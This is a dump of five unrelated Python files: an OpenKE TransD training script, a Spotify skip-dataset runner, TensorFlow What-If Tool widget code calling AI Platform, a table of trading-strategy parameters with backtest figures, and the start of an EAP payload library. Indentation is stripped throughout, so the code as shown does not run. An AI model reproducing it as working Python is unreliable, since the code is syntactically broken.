con.set_in_path("./benchmarks/FB15K237/")
con.set_test_link_prediction(True)
# con.set_test_triple_classification(True)
con.set_work_threads(8)
con.set_train_times(1000)
con.set_nbatches(100)
con.set_alpha(1.0)
con.set_margin(4.0)
con.set_bern(1)
con.set_dimension(200)
con.set_ent_neg_rate(25)
con.set_rel_neg_rate(0)
con.set_opt_method("SGD")
#Models will be exported via tf.Saver() automatically.
con.set_export_files("./res/model.vec.tf", 0)
#Model parameters will be exported to json files automatically.
con.set_out_files("./res/embedding.vec.json")
#Initialize experimental settings.
con.init()
#Set the knowledge embedding model
con.set_model(models.TransD)
#Train the model.
con.run()
#To test models after training needs "set_test_flag(True)".
con.test()
|
from database.database_util import connect_to_skip_database
from skip_dataset.generate_histogram import generate_histogram
from skip_dataset.generate_track_data import generate_track_data
from skip_dataset.plot_track_sum import plot_track_sum
# File used to execute different functions related to Spotify Sequential Skip Prediction Challenge dataset.
# The functions are roughly grouped in different categories.
# Recommended use is to only execute one at the time,
# each function is explained in the associated file.
if __name__ == '__main__':
# Establish a database connection.
connect_to_skip_database()
# generate_track_data()
# plot_track_sum()
generate_histogram()
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import googleapiclient.discovery
import os
import tensorflow as tf
from IPython import display
from google.protobuf import json_format
from numbers import Number
from six import ensure_str
from tensorboard.plugins.interactive_inference.utils import inference_utils
# Constants used in mutant inference generation.
NUM_MUTANTS_TO_GENERATE = 10
NUM_EXAMPLES_FOR_MUTANT_ANALYSIS = 50
# Custom user agent for tracking number of calls to Cloud AI Platform.
USER_AGENT_FOR_CAIP_TRACKING = 'WhatIfTool'
class WitWidgetBase(object):
"""WIT widget base class for common code between Jupyter and Colab."""
def __init__(self, config_builder):
"""Constructor for WitWidgetBase.
Args:
config_builder: WitConfigBuilder object containing settings for WIT.
"""
tf.logging.set_verbosity(tf.logging.WARN)
config = config_builder.build()
copied_config = dict(config)
self.estimator_and_spec = (
dict(config.get('estimator_and_spec'))
if 'estimator_and_spec' in config else {})
self.compare_estimator_and_spec = (
dict(config.get('compare_estimator_and_spec'))
if 'compare_estimator_and_spec' in config else {})
if 'estimator_and_spec' in copied_config:
del copied_config['estimator_and_spec']
if 'compare_estimator_and_spec' in copied_config:
del copied_config['compare_estimator_and_spec']
self.custom_predict_fn = (
config.get('custom_predict_fn')
if 'custom_predict_fn' in config else None)
self.compare_custom_predict_fn = (
config.get('compare_custom_predict_fn')
if 'compare_custom_predict_fn' in config else None)
self.adjust_prediction_fn = (
config.get('adjust_prediction')
if 'adjust_prediction' in config else None)
self.compare_adjust_prediction_fn = (
config.get('compare_adjust_prediction')
if 'compare_adjust_prediction' in config else None)
self.adjust_example_fn = (
config.get('adjust_example')
if 'adjust_example' in config else None)
self.compare_adjust_example_fn = (
config.get('compare_adjust_example')
if 'compare_adjust_example' in config else None)
if 'custom_predict_fn' in copied_config:
del copied_config['custom_predict_fn']
if 'compare_custom_predict_fn' in copied_config:
del copied_config['compare_custom_predict_fn']
if 'adjust_prediction' in copied_config:
del copied_config['adjust_prediction']
if 'compare_adjust_prediction' in copied_config:
del copied_config['compare_adjust_prediction']
if 'adjust_example' in copied_config:
del copied_config['adjust_example']
if 'compare_adjust_example' in copied_config:
del copied_config['compare_adjust_example']
self.set_examples(config['examples'])
del copied_config['examples']
self.config = copied_config
# If using AI Platform for prediction, set the correct custom prediction
# functions.
if self.config.get('use_aip'):
self.custom_predict_fn = self._predict_aip_model
if self.config.get('compare_use_aip'):
self.compare_custom_predict_fn = self._predict_aip_compare_model
def _get_element_html(self):
return """
<link rel="import" href="/nbextensions/wit-widget/wit_jupyter.html">"""
def set_examples(self, examples):
"""Sets the examples shown in WIT.
The examples are initially set by the examples specified in the config
builder during construction. This method can change which examples WIT
displays.
"""
self.examples = [json_format.MessageToJson(ex) for ex in examples]
self.updated_example_indices = set(range(len(examples)))
def json_to_proto(self, json):
ex = (tf.train.SequenceExample()
if self.config.get('are_sequence_examples')
else tf.train.Example())
json_format.Parse(json, ex)
return ex
def infer_impl(self):
"""Performs inference on examples that require inference."""
indices_to_infer = sorted(self.updated_example_indices)
examples_to_infer = [
self.json_to_proto(self.examples[index]) for index in indices_to_infer]
infer_objs = []
attribution_objs = []
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
self.updated_example_indices = set()
return {
'inferences': {'indices': indices_to_infer, 'results': infer_objs},
'label_vocab': self.config.get('label_vocab'),
'attributions': attribution_objs}
def infer_mutants_impl(self, info):
"""Performs mutant inference on specified examples."""
example_index = int(info['example_index'])
feature_name = info['feature_name']
examples = (self.examples if example_index == -1
else [self.examples[example_index]])
examples = [self.json_to_proto(ex) for ex in examples]
scan_examples = [self.json_to_proto(ex) for ex in self.examples[0:50]]
serving_bundles = []
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn))
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn))
viz_params = inference_utils.VizParams(
info['x_min'], info['x_max'],
scan_examples, 10,
info['feature_index_pattern'])
return inference_utils.mutant_charts_for_feature(
examples, feature_name, serving_bundles, viz_params)
def get_eligible_features_impl(self):
"""Returns information about features eligible for mutant inference."""
examples = [self.json_to_proto(ex) for ex in self.examples[
0:NUM_EXAMPLES_FOR_MUTANT_ANALYSIS]]
return inference_utils.get_eligible_features(
examples, NUM_MUTANTS_TO_GENERATE)
def create_sprite(self):
"""Returns an encoded image of thumbnails for image examples."""
# Generate a sprite image for the examples if the examples contain the
# standard encoded image feature.
if not self.examples:
return None
example_to_check = self.json_to_proto(self.examples[0])
feature_list = (example_to_check.context.feature
if self.config.get('are_sequence_examples')
else example_to_check.features.feature)
if 'image/encoded' in feature_list:
example_strings = [
self.json_to_proto(ex).SerializeToString()
for ex in self.examples]
encoded = ensure_str(base64.b64encode(
inference_utils.create_sprite_image(example_strings)))
return 'data:image/png;base64,{}'.format(encoded)
else:
return None
def _json_from_tf_examples(self, tf_examples):
json_exs = []
feature_names = self.config.get('feature_names')
for ex in tf_examples:
# Create a JSON list or dict for each example depending on settings.
# Strip out any explicitly-labeled target feature from the example.
# This is needed because AI Platform models that accept JSON cannot handle
# when non-input features are provided as part of the object to run
# prediction on.
if self.config.get('uses_json_list'):
json_ex = []
for feat in ex.features.feature:
if feature_names and feat in feature_names:
feat_idx = feature_names.index(feat)
else:
feat_idx = int(feat)
if (feat == self.config.get('target_feature') or
feat_idx == self.config.get('target_feature')):
continue
# Ensure the example value list is long enough to add the next feature
# from the tf.Example.
if feat_idx >= len(json_ex):
json_ex.extend([None] * (feat_idx - len(json_ex) + 1))
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat_idx] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat_idx] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat_idx] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
else:
json_ex = {}
for feat in ex.features.feature:
if feat == self.config.get('target_feature'):
continue
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
json_exs.append(json_ex)
return json_exs
def _predict_aip_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address'),
self.config.get('model_name'), self.config.get('model_signature'),
self.config.get('force_json_input'), self.adjust_example_fn,
self.adjust_prediction_fn)
def _predict_aip_compare_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address_2'),
self.config.get('model_name_2'), self.config.get('model_signature_2'),
self.config.get('compare_force_json_input'),
self.compare_adjust_example_fn,
self.compare_adjust_prediction_fn)
def _predict_aip_impl(self, examples, project, model, version, force_json,
adjust_example, adjust_prediction):
"""Custom prediction function for running inference through AI Platform."""
# Set up environment for GCP call for specified project.
os.environ['GOOGLE_CLOUD_PROJECT'] = project
service = googleapiclient.discovery.build('ml', 'v1', cache_discovery=False)
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
# Properly package the examples to send for prediction.
if self.config.get('uses_json_input') or force_json:
examples_for_predict = self._json_from_tf_examples(examples)
else:
examples_for_predict = [{'b64': base64.b64encode(
example.SerializeToString()).decode('utf-8') }
for example in examples]
# If there is a user-specified input example adjustment to make, make it.
if adjust_example:
examples_for_predict = [
adjust_example(ex) for ex in examples_for_predict]
# Send request, including custom user-agent for tracking.
request_builder = service.projects().predict(
name=name,
body={'instances': examples_for_predict}
)
user_agent = request_builder.headers.get('user-agent')
request_builder.headers['user-agent'] = (
USER_AGENT_FOR_CAIP_TRACKING + ('-' + user_agent if user_agent else ''))
response = request_builder.execute()
if 'error' in response:
raise RuntimeError(response['error'])
# Get the key to extract the prediction results from.
results_key = self.config.get('predict_output_tensor')
if results_key is None:
if self.config.get('model_type') == 'classification':
results_key = 'probabilities'
else:
results_key = 'outputs'
# Parse the results from the response and return them.
results = []
attributions = (response['attributions']
if 'attributions' in response else None)
for pred in response['predictions']:
# If the prediction contains a key to fetch the prediction, use it.
if isinstance(pred, dict):
pred = pred[results_key]
# If the model is regression and the response is a list, extract the
# score by taking the first element.
if (self.config.get('model_type') == 'regression' and
isinstance(pred, list)):
pred = pred[0]
# If an prediction adjustment function was provided, use it to adjust
# the prediction.
if adjust_prediction:
pred = adjust_prediction(pred)
results.append(pred)
return {'predictions': results, 'attributions': attributions}
|
dnas = [
['wVW*?', 48, 52, 15.52, 40, 10, -0.23, {'ott_len': 35, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['ftUQf', 46, 66, 10.18, 58, 12, 3.51, {'ott_len': 33, 'ott_percent': 246, 'ott_bw': 117, 'tps_qty_index': 65, 'max_risk': 54}],
['ui*5<', 44, 84, 12.12, 42, 14, 6.81, {'ott_len': 35, 'ott_percent': 232, 'ott_bw': 64, 'tps_qty_index': 21, 'max_risk': 28}],
['-SUNv', 51, 64, 24.47, 58, 12, 3.76, {'ott_len': 26, 'ott_percent': 205, 'ott_bw': 117, 'tps_qty_index': 60, 'max_risk': 64}],
[':YY:_', 54, 59, 21.43, 58, 12, 3.52, {'ott_len': 27, 'ott_percent': 212, 'ott_bw': 122, 'tps_qty_index': 28, 'max_risk': 50}],
['@_W*?', 44, 58, 22.34, 55, 9, 4.25, {'ott_len': 28, 'ott_percent': 220, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
[':VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['7VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['q9da]', 71, 14, 11.37, 75, 4, 3.13, {'ott_len': 34, 'ott_percent': 172, 'ott_bw': 136, 'tps_qty_index': 90, 'max_risk': 49}],
['eVswv', 63, 19, 11.55, 100, 4, 5.34, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 125, 'max_risk': 64}],
['-VUWv', 53, 66, 19.51, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 117, 'tps_qty_index': 74, 'max_risk': 64}],
['@TW*?', 51, 56, 14.24, 45, 11, -1.0, {'ott_len': 28, 'ott_percent': 206, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@^W*?', 45, 57, 21.06, 55, 9, 4.26, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['_W6,U', 40, 84, 9.31, 50, 14, 6.21, {'ott_len': 32, 'ott_percent': 210, 'ott_bw': 79, 'tps_qty_index': 6, 'max_risk': 43}],
['-VW*9', 57, 49, 23.19, 27, 11, -0.52, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 26}],
['@cW*?', 47, 61, 22.93, 50, 12, 0.29, {'ott_len': 28, 'ott_percent': 225, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['3OWXC', 54, 57, 20.13, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 32}],
['3OWXE', 55, 58, 20.61, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 33}],
['t]bik', 57, 35, 9.33, 62, 8, 4.47, {'ott_len': 35, 'ott_percent': 217, 'ott_bw': 134, 'tps_qty_index': 103, 'max_risk': 57}],
['-VW<v', 58, 60, 23.78, 58, 12, 3.9, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 32, 'max_risk': 64}],
['-VWMv', 50, 61, 23.08, 58, 12, 3.48, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 59, 'max_risk': 64}],
['-VW.v', 49, 61, 23.86, 58, 12, 4.35, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['7Fpob', 66, 12, 12.15, 75, 4, 3.62, {'ott_len': 27, 'ott_percent': 189, 'ott_bw': 151, 'tps_qty_index': 112, 'max_risk': 52}],
['3OW?n', 54, 59, 24.5, 66, 12, 3.73, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 59}],
['-VWWu', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
[',VWWv', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['-VWWs', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 62}],
['vNqn]', 81, 11, 12.65, 100, 4, 9.27, {'ott_len': 35, 'ott_percent': 199, 'ott_bw': 152, 'tps_qty_index': 111, 'max_risk': 49}],
['-VWWl', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 58}],
['-VWWa', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 51}],
['-VWW^', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 49}],
['3OW5n', 50, 59, 24.24, 66, 12, 4.05, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 21, 'max_risk': 59}],
['-VWLv', 50, 60, 24.44, 58, 12, 2.84, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 57, 'max_risk': 64}],
['=ptVt', 73, 26, 30.29, 50, 8, 1.89, {'ott_len': 28, 'ott_percent': 241, 'ott_bw': 156, 'tps_qty_index': 73, 'max_risk': 63}],
['g^VGt', 57, 61, 16.78, 63, 11, 5.52, {'ott_len': 33, 'ott_percent': 219, 'ott_bw': 119, 'tps_qty_index': 49, 'max_risk': 63}],
['HPqWv', 64, 17, 16.65, 60, 5, 2.69, {'ott_len': 29, 'ott_percent': 201, 'ott_bw': 152, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW=v', 55, 61, 21.99, 58, 12, 3.27, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 33, 'max_risk': 64}],
['-VW?v', 55, 61, 23.02, 58, 12, 3.04, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 64}],
['eRQWv', 52, 63, 17.59, 63, 11, 4.81, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 112, 'tps_qty_index': 74, 'max_risk': 64}],
['-dW6n', 51, 64, 27.68, 58, 12, 5.23, {'ott_len': 26, 'ott_percent': 226, 'ott_bw': 120, 'tps_qty_index': 22, 'max_risk': 59}],
['@VX*?', 50, 53, 24.04, 50, 10, 1.23, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 121, 'tps_qty_index': 3, 'max_risk': 30}],
['[\\sta', 66, 18, 12.71, 80, 5, 5.61, {'ott_len': 31, 'ott_percent': 216, 'ott_bw': 155, 'tps_qty_index': 120, 'max_risk': 51}],
['ePRWv', 53, 60, 20.61, 63, 11, 4.2, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 114, 'tps_qty_index': 74, 'max_risk': 64}],
['O=ITi', 49, 69, 21.32, 61, 13, 4.06, {'ott_len': 30, 'ott_percent': 177, 'ott_bw': 102, 'tps_qty_index': 70, 'max_risk': 56}],
['YOR9c', 51, 60, 21.87, 58, 12, 2.39, {'ott_len': 31, 'ott_percent': 200, 'ott_bw': 114, 'tps_qty_index': 27, 'max_risk': 52}],
['-VW;v', 56, 60, 21.81, 58, 12, 3.24, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 30, 'max_risk': 64}],
['eEsWv', 66, 9, 10.3, 75, 4, 5.13, {'ott_len': 33, 'ott_percent': 187, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['?^WWv', 53, 60, 21.94, 63, 11, 6.61, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['=bVNC', 46, 62, 22.8, 50, 12, -0.59, {'ott_len': 28, 'ott_percent': 224, 'ott_bw': 119, 'tps_qty_index': 60, 'max_risk': 32}],
['3eWXn', 53, 64, 29.51, 58, 12, 4.39, {'ott_len': 26, 'ott_percent': 227, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 59}],
['FVW*?', 50, 53, 22.75, 36, 11, -1.52, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['?dpMr', 61, 26, 28.05, 50, 8, 2.43, {'ott_len': 28, 'ott_percent': 226, 'ott_bw': 151, 'tps_qty_index': 59, 'max_risk': 62}],
['3fWHn', 56, 64, 27.28, 58, 12, 4.26, {'ott_len': 26, 'ott_percent': 229, 'ott_bw': 120, 'tps_qty_index': 51, 'max_risk': 59}],
['QYRcn', 50, 65, 19.63, 58, 12, 3.49, {'ott_len': 30, 'ott_percent': 212, 'ott_bw': 114, 'tps_qty_index': 93, 'max_risk': 59}],
['IVWWv', 51, 58, 22.46, 58, 12, 1.85, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['?VW.v', 49, 59, 25.96, 58, 12, 2.45, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['MVsWv', 66, 18, 17.72, 60, 5, 4.17, {'ott_len': 30, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['@VW*F', 49, 55, 26.22, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 34}],
['?VW2v', 52, 59, 27.13, 58, 12, 2.6, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 16, 'max_risk': 64}],
['eVkWv', 72, 22, 20.19, 66, 6, 5.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 145, 'tps_qty_index': 74, 'max_risk': 64}],
['?VuWv', 62, 16, 15.34, 60, 5, 2.75, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 157, 'tps_qty_index': 74, 'max_risk': 64}],
['hPmHf', 73, 19, 19.46, 75, 4, 4.96, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 147, 'tps_qty_index': 51, 'max_risk': 54}],
['hPPHs', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 62}],
['ePPHt', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 63}],
['XRV.a', 50, 54, 25.07, 58, 12, 1.52, {'ott_len': 31, 'ott_percent': 204, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePPHa', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 51}],
['ePPH]', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 49}],
['CMNWv', 52, 71, 22.36, 58, 12, 4.3, {'ott_len': 28, 'ott_percent': 197, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['BVV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['<VV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePjWv', 68, 22, 19.21, 66, 6, 5.68, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 144, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW*=', 55, 54, 29.83, 33, 12, -1.75, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 28}],
['WrVZ;', 49, 65, 9.97, 50, 10, -1.45, {'ott_len': 31, 'ott_percent': 244, 'ott_bw': 119, 'tps_qty_index': 79, 'max_risk': 27}],
['@VW)?', 48, 54, 23.4, 45, 11, -1.08, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 2, 'max_risk': 30}],
['E^c[A', 58, 34, 10.18, 50, 10, -1.0, {'ott_len': 29, 'ott_percent': 219, 'ott_bw': 135, 'tps_qty_index': 81, 'max_risk': 31}],
['[VsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['WVsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['fVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['gVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['o4,@X', 42, 98, 8.28, 45, 20, 5.45, {'ott_len': 34, 'ott_percent': 166, 'ott_bw': 66, 'tps_qty_index': 38, 'max_risk': 45}],
['@VW*A', 49, 55, 25.8, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 31}],
['@VW.?', 49, 55, 20.38, 45, 11, -0.98, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 30}],
['@VWF?', 54, 55, 19.17, 45, 11, -1.64, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 47, 'max_risk': 30}],
['ePPWb', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['ePPW\\', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 48}],
['eSNWd', 50, 67, 18.68, 53, 13, 2.22, {'ott_len': 33, 'ott_percent': 205, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 53}],
['@XW*?', 50, 54, 25.83, 50, 10, 1.55, {'ott_len': 28, 'ott_percent': 211, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@VW4?', 49, 55, 17.59, 45, 11, -1.73, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 19, 'max_risk': 30}],
['eVPWc', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['`RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['cRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['\\RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
[']RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['aRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['^RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['_RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['eRNDv', 53, 67, 17.86, 53, 13, 3.08, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 44, 'max_risk': 64}],
['eRNWk', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 57}],
['eRNWZ', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 47}],
['LewDb', 76, 17, 19.15, 80, 5, 8.45, {'ott_len': 30, 'ott_percent': 227, 'ott_bw': 160, 'tps_qty_index': 44, 'max_risk': 52}],
]
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - May 2012
# Version 0.2.8, Last change on May 31, 2012
# This software is distributed under the terms of BSD license.
##################################################################
# All functions needed to build/decode EAP Payload
import xml.dom.minidom as minidom
import struct
import sys
import logging
import time
import platform
#import string
# subprocess does not work as expected in python 2.4
# so we use commands instead
# but for Windows commands does not work, so...
import subprocess
import commands
ERROR=-1
# EAP-Payload specific definitions
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
# EAP Method Types as allocated by IANA:
# http://www.iana.org/assignments/eap-numbers
# Only supported types are listed here
EAP_TYPE_IDENTITY = 1
EAP_TYPE_SIM = 18
EAP_TYPE_AKA = 23
EAP_TYPE_AKAPRIME = 50
class EAPItem:
def __init__(self):
self.cmd=0
